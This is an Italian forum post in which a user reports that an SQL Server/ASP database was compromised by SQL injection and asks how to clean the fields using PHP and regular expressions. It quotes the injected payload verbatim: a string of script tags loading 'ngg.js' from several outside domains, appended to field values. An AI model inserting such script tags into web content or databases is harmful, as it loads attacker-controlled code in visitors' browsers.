Ciao a tutti,
Un software creato con sqlserver/asp è stato attaccato con sql injection e d ora tutti i campi delle tabele sono stati modificati aggiundo al testo originale un link di questo tipo:
quindi per esempio il campo cognome me lo ritrovo così:Codice PHP:<script src=http://www.gitporg.com/ngg.js></script><script src=http://www.adwnetw.com/ngg.js></script><script src=http://www.adpzo.com/ngg.js></script><script src=http://www.tctcow.com/ngg.js></script><script src=http://www.bnrc.ru/ngg.js></script><script src=http://www.cgt4.ru/ngg.js></script><script src=http://www.ncwc.ru/ngg.js></script><script src=http://www.kr92.ru/ngg.js></script><script src=http://www.ncwc.ru/ngg.js></script>
Codice PHP:ROSSI<script src=http://www.gitporg.com/ngg.js></script><script src=http://www.adwnetw.com/ngg.js></script><script src=http://www.adpzo.com/ngg.js></script><script src=http://www.tctcow.com/ngg.js></script><script src=http://www.bnrc.ru/ngg.js></script><script src=http://www.cgt4.ru/ngg.js></script><script src=http://www.ncwc.ru/ngg.js></script><script src=http://www.kr92.ru/ngg.js></script><script src=http://www.ncwc.ru/ngg.js></script>
siccome conosco meglio php e posso connettermi anche con il php chiedevo come posso risolvere con update e fare la pulizia del db.
forse con le regular expression? anche se non li conosco tanto bene.... insomma qualsiasi consgiglio per pulire sto sql server e ben accetto!!!
una buona giornata
Giuseppe
Rispondi quotando